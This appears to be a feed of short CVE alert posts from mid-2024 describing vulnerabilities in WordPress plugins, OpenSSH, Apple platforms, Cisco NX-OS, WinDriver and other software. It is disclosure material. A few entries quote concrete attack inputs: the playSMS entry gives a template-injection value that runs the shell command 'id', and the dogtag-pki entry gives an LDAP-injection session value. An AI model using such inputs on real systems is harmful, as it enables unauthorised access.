🚨 CVE-2024-2376The WPQA Builder WordPress plugin before 6.1.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks🎖@cveNotify |
|
| 2024-07-03 18:37:31 |
🚨 CVE-2024-2235The Himer WordPress theme before 2.1.1 does not have CSRF checks in some places, which could allow attackers to make users vote on any polls, including those they don't have access to via a CSRF attack🎖@cveNotify |
|
| 2024-07-03 18:37:30 |
🚨 CVE-2024-2233The Himer WordPress theme before 2.1.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. These include declining and accepting group invitations or leaving a group🎖@cveNotify |
|
| 2024-07-03 18:37:26 |
🚨 CVE-2024-4543The Snippet Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.1.4. This is due to missing or incorrect nonce validation when adding or editing shortcodes. This makes it possible for unauthenticated attackers to modify shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-03 18:37:25 |
🚨 CVE-2022-47577An issue was discovered in the endpoint protection agent in Zoho ManageEngine Device Control Plus 10.1.2228.15. Despite configuring complete restrictions on USB pendrives, USB HDD devices, memory cards, USB connections to mobile devices, etc., it is still possible to bypass the USB restrictions by making use of a virtual machine (VM). This allows a file to be exchanged outside the laptop/system. VMs can be created by any user (even without admin rights). The data exfiltration can occur without any record in the audit trail of Windows events on the host machine. NOTE: the vendor's position is "it's not a vulnerability in our product."🎖@cveNotify |
|
| 2024-07-03 18:37:24 |
🚨 CVE-2017-16231In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used🎖@cveNotify |
|
| 2024-07-03 18:07:50 |
🚨 CVE-2023-41922A 'Cross-site Scripting' (XSS) vulnerability, characterized by improper input neutralization during web page generation, has been discovered. This vulnerability allows for Stored XSS attacks to occur. Multiple areas within the administration interface of the webserver lack adequate input validation, resulting in multiple instances of Stored XSS vulnerabilities.🎖@cveNotify |
|
| 2024-07-03 18:07:44 |
🚨 CVE-2024-6172The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.25 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-03 18:07:43 |
🚨 CVE-2024-32853Dell PowerScale OneFS versions 8.2.2.x through 9.7.0.2 contain an execution with unnecessary privileges vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to escalation of privileges.🎖@cveNotify |
|
| 2024-07-03 18:07:42 |
🚨 CVE-2024-32852Dell PowerScale OneFS versions 8.2.2.x through 9.7.0.0 contain use of a broken or risky cryptographic algorithm vulnerability. An unprivileged network malicious attacker could potentially exploit this vulnerability, leading to data leaks.🎖@cveNotify |
|
| 2024-07-03 17:37:43 |
🚨 CVE-2024-39844In ZNC before 1.9.1, remote code execution can occur in modtcl.🎖@cveNotify |
|
| 2024-07-03 17:37:36 |
🚨 CVE-2024-5037A flaw was found in OpenShift's Telemeter. If certain conditions are in place, an attacker can use a forged token to bypass the issue ("iss") check during JSON web token (JWT) authentication.🎖@cveNotify |
|
| 2024-07-03 17:37:35 |
🚨 CVE-2024-3727A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.🎖@cveNotify |
|
| 2024-07-03 16:38:22 |
🚨 CVE-2024-34102Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-07-03 16:38:18 |
🚨 CVE-2024-27850This issue was addressed with improvements to the noise injection algorithm. This issue is fixed in visionOS 1.2, macOS Sonoma 14.5, Safari 17.5, iOS 17.5 and iPadOS 17.5. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-07-03 16:38:17 |
🚨 CVE-2024-27845A privacy issue was addressed with improved handling of temporary files. This issue is fixed in iOS 17.5 and iPadOS 17.5. An app may be able to access Notes attachments.🎖@cveNotify |
|
| 2024-07-03 16:38:12 |
🚨 CVE-2024-27840The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5. An attacker that has already achieved kernel code execution may be able to bypass kernel memory protections.🎖@cveNotify |
|
| 2024-07-03 16:38:11 |
🚨 CVE-2022-38650A remote unauthenticated insecure deserialization vulnerability exists in VMware Hyperic Server 5.8.6. Exploitation of this vulnerability enables a malicious party to run arbitrary code or malware within Hyperic Server and the host operating system with the privileges of the Hyperic server process. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-03 16:08:39 |
🚨 CVE-2024-5606The Quiz and Survey Master (QSM) WordPress plugin before 9.0.2 is vulnerable does not validate and escape the question_id parameter in the qsm_bulk_delete_question_from_database AJAX action, leading to a SQL injection exploitable by Contributors and above role🎖@cveNotify |
|
| 2024-07-03 16:08:35 |
🚨 CVE-2024-1427The The Post Grid – Shortcode, Gutenberg Blocks and Elementor Addon for Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the section title tag attribute in all versions up to, and including, 7.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-03 16:08:34 |
🚨 CVE-2024-5419The Void Contact Form 7 Widget For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cf7_redirect_page' attribute within the plugin's Void Contact From 7 widget in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-03 16:08:30 |
🚨 CVE-2024-5736Server Side Request Forgery (SSRF) vulnerability in AdmirorFrames Joomla! extension in afGdStream.php script allows to access local files or server pages available only from localhost. This issue affects AdmirorFrames: before 5.0.🎖@cveNotify |
|
| 2024-07-03 16:08:29 |
🚨 CVE-2024-27885This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Sonoma 14.5, macOS Ventura 13.6.7, macOS Monterey 12.7.5. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-07-03 16:08:28 |
🚨 CVE-2024-27857An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in visionOS 1.2, macOS Sonoma 14.5, tvOS 17.5, iOS 17.5 and iPadOS 17.5. A remote attacker may be able to cause unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-07-03 15:08:55 |
🚨 CVE-2024-6375A command for refining a collection shard key is missing an authorization check. This may cause the command to run directly on a shard, leading to either degradation of query performance, or to revealing chunk boundaries through timing side channels. This affects MongoDB Server v5.0 versions, prior to 5.0.22, MongoDB Server v6.0 versions, prior to 6.0.11 and MongoDB Server v7.0 versions prior to 7.0.3.🎖@cveNotify |
|
| 2024-07-03 15:08:54 |
🚨 CVE-2024-34696GeoServer is an open source server that allows users to share and edit geospatial data. Starting in version 2.10.0 and prior to versions 2.24.4 and 2.25.1, GeoServer's Server Status page and REST API lists all environment variables and Java properties to any GeoServer user with administrative rights as part of those modules' status message. These variables/properties can also contain sensitive information, such as database passwords or API keys/tokens. Additionally, many community-developed GeoServer container images `export` other credentials from their start-up scripts as environment variables to the GeoServer (`java`) process. The precise scope of the issue depends on which container image is used and how it is configured.The `about status` API endpoint which powers the Server Status page is only available to administrators.Depending on the operating environment, administrators might have legitimate access to credentials in other ways, but this issue defeats more sophisticated controls (like break-glass access to secrets or role accounts).By default, GeoServer only allows same-origin authenticated API access. This limits the scope for a third-party attacker to use an administrator’s credentials to gain access to credentials. The researchers who found the vulnerability were unable to determine any other conditions under which the GeoServer REST API may be available more broadly.Users should update container images to use GeoServer 2.24.4 or 2.25.1 to get the bug fix. As a workaround, leave environment variables and Java system properties hidden by default. Those who provide the option to re-enable it should communicate the impact and risks so that users can make an informed choice.🎖@cveNotify |
|
| 2024-07-03 12:38:40 |
🚨 CVE-2024-6427Uncontrolled Resource Consumption vulnerability in MESbook 20221021.03 version. An unauthenticated remote attacker can use the "message" parameter to inject a payload with dangerous JavaScript code, causing the application to loop requests on itself, which could lead to resource consumption and disable the application.🎖@cveNotify |
|
| 2024-07-03 12:38:39 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-03 11:39:16 |
🚨 CVE-2024-6469A vulnerability was found in playSMS 1.4.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php?app=main&inc=feature_firewall&op=firewall_list of the component Template Handler. The manipulation of the argument IP address with the input {{`id`} leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270277 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-03 09:37:54 |
🚨 CVE-2020-14871Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-07-03 08:38:30 |
🚨 CVE-2024-6263The WP Lightbox 2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘title’ parameter in all versions up to, and including, 3.0.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-03 08:38:29 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-03 06:39:12 |
🚨 CVE-2024-37082Security check loophole in HAProxy release (in combination with routing release) in Cloud Foundry prior to v40.17.0 potentially allows bypass of mTLS authentication to applications hosted on Cloud Foundry.🎖@cveNotify |
|
| 2024-07-03 06:39:11 |
🚨 CVE-2024-2375The WPQA Builder WordPress plugin before 6.1.1 does not sanitise and escape some of its Slider settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-03 06:39:06 |
🚨 CVE-2024-2234The Himer WordPress theme before 2.1.1 does not sanitise and escape some of its Post settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-03 06:39:05 |
🚨 CVE-2024-2040The Himer WordPress theme before 2.1.1 does not have CSRF checks in some places, which could allow attackers to make users join private groups via a CSRF attack🎖@cveNotify |
|
| 2024-07-03 05:37:24 |
🚨 CVE-2024-4543The Snippet Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.1.4. This is due to missing or incorrect nonce validation when adding or editing shortcodes. This makes it possible for unauthenticated attackers to modify shortcodes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-03 01:38:09 |
🚨 CVE-2010-5164Race condition in KingSoft Personal Firewall 9 Plus 2009.05.07.70 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-07-03 01:38:02 |
🚨 CVE-2011-0611Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a "group of included constants," object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.🎖@cveNotify |
|
| 2024-07-03 01:38:01 |
🚨 CVE-2007-3484Cross-site scripting (XSS) vulnerability in search.php in Google Custom Search Engine allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: this issue is disputed by the Google Security Team, who states that "Google does not provide the 'search.php' script referenced. When a user creates a custom search engine, we provide them with a block of javascript to include on their site. Some users write additional code around this block of javascript to further customize their website.🎖@cveNotify |
|
| 2024-07-03 01:07:50 |
🚨 CVE-2024-20399A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root. Note: To successfully exploit this vulnerability on a Cisco NX-OS device, an attacker must have Administrator credentials.🎖@cveNotify |
|
| 2024-07-02 23:37:37 |
🚨 CVE-2024-4708mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device.🎖@cveNotify |
|
| 2024-07-02 23:37:34 |
🚨 CVE-2023-4727A flaw was found in dogtag-pki and pki-core. The token authentication scheme can be bypassed with a LDAP injection. By passing the query string parameter sessionID=*, an attacker can authenticate with an existing session saved in the LDAP directory server, which may lead to escalation of privilege.🎖@cveNotify |
|
| 2024-07-02 23:37:33 |
🚨 CVE-2024-2199A denial of service vulnerability was found in 389-ds-base ldap server. This issue may allow an authenticated user to cause a server crash while modifying `userPassword` using malformed input.🎖@cveNotify |
|
| 2024-07-02 23:37:32 |
🚨 CVE-2023-7250A flaw was found in iperf, a utility for testing network performance using TCP, UDP, and SCTP. A malicious or malfunctioning client can send less than the expected amount of data to the iperf server, which can cause the server to hang indefinitely waiting for the remainder or until the connection gets closed. This will prevent other connections to the server, leading to a denial of service.🎖@cveNotify |
|
| 2024-07-02 22:38:32 |
🚨 CVE-2024-6453A vulnerability was found in itsourcecode Farm Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /quarantine.php?id=3. The manipulation of the argument pigno/breed/reason leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270241 was assigned to this vulnerability. NOTE: Original submission mentioned parameter pigno only but the VulDB data analysis team determined two additional parameters to be affected as well.🎖@cveNotify |
|
| 2024-07-02 22:38:31 |
🚨 CVE-2024-24791The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.🎖@cveNotify |
|
| 2024-07-02 21:38:39 |
🚨 CVE-2024-39326SkillTree is a micro-learning gamification platform. Prior to version 2.12.6, the endpoint `/admin/projects/{projectname}/skills/{skillname}/video` (and probably others) is open to a cross-site request forgery (CSRF) vulnerability. Due to the endpoint being CSRFable e.g POST request, supports a content type that can be exploited (multipart file upload), makes a state change and has no CSRF mitigations in place (samesite flag, CSRF token). It is possible to perform a CSRF attack against a logged in admin account, allowing an attacker that can target a logged in admin of Skills Service to modify the videos, captions, and text of the skill. Version 2.12.6 contains a patch for this issue.🎖@cveNotify |
|
| 2024-07-02 21:38:35 |
🚨 CVE-2024-39322aimeos/ai-admin-jsonadm is the Aimeos e-commerce JSON API for administrative tasks. In versions prior to 2020.10.13, 2021.10.6, 2022.10.3, 2023.10.4, and 2024.4.2, improper access control allows editors to remove admin group and locale configuration in the Aimeos backend. Versions 2020.10.13, 2021.10.6, 2022.10.3, 2023.10.4, and 2024.4.2 contain a fix for the issue.🎖@cveNotify |
|
| 2024-07-02 21:38:34 |
🚨 CVE-2022-29622An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled. Strapi does not consider this to be a valid vulnerability.🎖@cveNotify |
|
| 2024-07-02 19:38:19 |
🚨 CVE-2017-20012A vulnerability classified as problematic has been found in WEKA INTEREST Security Scanner up to 1.8. Affected is Stresstest Scheme Handler which leads to a denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-07-02 19:38:12 |
🚨 CVE-2021-45364A Code Execution vulnerability exists in Statamic Version through 3.2.26 via SettingsController.php. NOTE: the vendor indicates that there was an error in publishing this CVE Record, and that all parties agree that the affected code was not used in any Statamic product🎖@cveNotify |
|
| 2024-07-02 19:38:11 |
🚨 CVE-2021-43574WebAdmin Control Panel in Atmail 6.5.0 (a version released in 2012) allows XSS via the format parameter to the default URI. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-07-02 16:37:57 |
🚨 CVE-2024-5866Vulnerability in Delinea Centrify PAS v. 21.3 and possibly others. The application is prone to the path traversal vulnerability allowing listing of arbitrary directory outside the root directory of the web application. Versions 23.1-HF7 and on have the patch.🎖@cveNotify |
|
| 2024-07-02 16:37:56 |
🚨 CVE-2024-4467A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.🎖@cveNotify |
|
| 2024-07-02 16:37:55 |
🚨 CVE-2024-3826In versions of Akana in versions prior to and including 2022.1.3 validation is broken when using the SAML Single Sign-On (SSO) functionality.🎖@cveNotify |
|
| 2024-07-02 16:37:52 |
🚨 CVE-2024-39323aimeos/ai-admin-graphql is the Aimeos GraphQL API admin interface. Starting in version 2022.04.01 and prior to versions 2022.10.10, 2023.10.6, and 2024.04.6, an improper access control vulnerability allows an editor to modify and take over an admin account in the back end. Versions 2022.10.10, 2023.10.6, and 2024.04.6 fix this issue.🎖@cveNotify |
|
| 2024-07-02 16:37:51 |
🚨 CVE-2024-25088Improper privilege management in Jungo WinDriver before 12.5.1 allows local attackers to escalate privileges and execute arbitrary code.🎖@cveNotify |
|
| 2024-07-02 16:37:50 |
🚨 CVE-2024-25087Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.7.0 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-02 16:37:46 |
🚨 CVE-2024-22105Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.5.1 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-02 16:37:45 |
🚨 CVE-2024-22103Out-of-Bounds Write vulnerability in Jungo WinDriver before 12.6.0 allows local attackers to cause a Windows blue screen error and Denial of Service (DoS).🎖@cveNotify |
|
| 2024-07-02 16:37:41 |
🚨 CVE-2024-22102Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.6.0 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-02 16:37:40 |
🚨 CVE-2023-51777Denial of Service (DoS) vulnerability in Jungo WinDriver before 12.1.0 allows local attackers to cause a Windows blue screen error.🎖@cveNotify |
|
| 2024-07-02 16:37:39 |
🚨 CVE-2024-38520SoftEtherVPN is a an open-source cross-platform multi-protocol VPN Program. When SoftEtherVPN is deployed with L2TP enabled on a device, it introduces the possibility of the host being used for amplification/reflection traffic generation because it will respond to every packet with two response packets that are larger than the request packet size. These sorts of techniques are used by external actors who generate spoofed source IPs to target a destination on the internet. This vulnerability has been patched in version 5.02.5185.🎖@cveNotify |
|
| 2024-07-02 15:08:55 |
🚨 CVE-2024-0979The Dashboard Widgets Suite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-02 15:08:51 |
🚨 CVE-2024-4615The Elespare – Blog, Magazine and Newspaper Addons for Elementor with Templates, Widgets, Kits, and Header/Footer Builder. One Click Import: No Coding Required! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Horizontal Nav Menu' widget in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-02 15:08:50 |
🚨 CVE-2024-4576The component listed above contains a vulnerability that allows an attacker to traverse directories and access sensitive files, leading to unauthorized disclosure of system configuration and potentially sensitive information.🎖@cveNotify |
|
| 2024-07-02 15:08:49 |
🚨 CVE-2024-5787The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's Link Effects widget in all versions up to, and including, 2.7.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-02 15:08:48 |
🚨 CVE-2024-5757The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url attribute within the plugin's Site Title widget in all versions up to, and including, 1.6.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-02 15:08:45 |
🚨 CVE-2024-5661An issue has been identified in both XenServer 8 and Citrix Hypervisor 8.2 CU1 LTSR which may allow a malicious administrator of a guest VM to cause the host to become slow and/or unresponsive.🎖@cveNotify |
|
| 2024-07-02 15:08:44 |
🚨 CVE-2024-4145The Search & Replace WordPress plugin before 3.2.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).🎖@cveNotify |
|
| 2024-07-02 15:08:43 |
🚨 CVE-2024-3032Themify Builder WordPress plugin before 7.5.8 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue🎖@cveNotify |
|
| 2024-07-02 14:08:03 |
🚨 CVE-2024-30067Winlogon Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-02 14:08:00 |
🚨 CVE-2024-30066Winlogon Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-02 14:07:59 |
🚨 CVE-2024-30064Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-02 14:07:58 |
🚨 CVE-2024-27799This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sonoma 14.5, macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8. An unprivileged app may be able to log keystrokes in other apps including those using secure input mode.🎖@cveNotify |
|
| 2024-07-02 13:37:38 |
🚨 CVE-2024-39119idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via admin/info_deal.php?mudi=rev&nohrefStr=close.🎖@cveNotify |
|
| 2024-07-02 13:37:37 |
🚨 CVE-2024-27815An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-07-02 13:37:34 |
🚨 CVE-2024-27812The issue was addressed with improvements to the file handling protocol. This issue is fixed in visionOS 1.2. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-07-02 13:37:33 |
🚨 CVE-2024-27808The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-07-02 13:37:32 |
🚨 CVE-2024-27807The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An app may be able to circumvent App Privacy Report logging.🎖@cveNotify |
|
| 2024-07-02 13:37:29 |
🚨 CVE-2024-27806This issue was addressed with improved environment sanitization. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-07-02 13:37:28 |
🚨 CVE-2024-27802An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-07-02 13:37:27 |
🚨 CVE-2016-6366Buffer overflow in Cisco Adaptive Security Appliance (ASA) Software through 9.4.2.3 on ASA 5500, ASA 5500-X, ASA Services Module, ASA 1000V, ASAv, Firepower 9300 ASA Security Module, PIX, and FWSM devices allows remote authenticated users to execute arbitrary code via crafted IPv4 SNMP packets, aka Bug ID CSCva92151 or EXTRABACON.🎖@cveNotify |
|
| 2024-07-02 12:38:01 |
🚨 CVE-2024-36982In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.109 and 9.1.2308.207, an attacker could trigger a null pointer reference on the cluster/config REST endpoint, which could result in a crash of the Splunk daemon.🎖@cveNotify |
|
| 2024-07-02 12:38:00 |
🚨 CVE-2024-20399A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root. Note: To successfully exploit this vulnerability on a Cisco NX-OS device, an attacker must have Administrator credentials.🎖@cveNotify |
|
| 2024-07-02 12:37:56 |
🚨 CVE-2024-2199A denial of service vulnerability was found in 389-ds-base ldap server. This issue may allow an authenticated user to cause a server crash while modifying `userPassword` using malformed input.🎖@cveNotify |
|
| 2024-07-02 12:37:55 |
🚨 CVE-2023-5090A flaw was found in KVM. An improper check in svm_set_x2apic_msr_interception() may allow direct access to host x2apic msrs when the guest resets its apic, potentially leading to a denial of service condition.🎖@cveNotify |
|
| 2024-07-02 12:37:54 |
🚨 CVE-2016-3393Graphics Device Interface (aka GDI or GDI+) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows remote attackers to execute arbitrary code via a crafted web site, aka "Windows Graphics Component RCE Vulnerability."🎖@cveNotify |
|
| 2024-07-02 12:37:51 |
🚨 CVE-2016-3298Microsoft Internet Explorer 9 through 11 and the Internet Messaging API in Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allow remote attackers to determine the existence of arbitrary files via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."🎖@cveNotify |
|
| 2024-07-02 12:37:50 |
🚨 CVE-2016-4657WebKit in Apple iOS before 9.3.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.🎖@cveNotify |
|
| 2024-07-02 12:37:49 |
🚨 CVE-2016-4655The kernel in Apple iOS before 9.3.5 allows attackers to obtain sensitive information from memory via a crafted app.🎖@cveNotify |
|
| 2024-07-02 12:37:45 |
🚨 CVE-2016-0162Microsoft Internet Explorer 9 through 11 allows remote attackers to determine the existence of files via crafted JavaScript code, aka "Internet Explorer Information Disclosure Vulnerability."🎖@cveNotify |
|
| 2024-07-02 12:37:44 |
